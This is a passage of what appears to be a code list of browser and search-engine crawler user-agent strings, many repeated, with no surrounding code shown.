'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
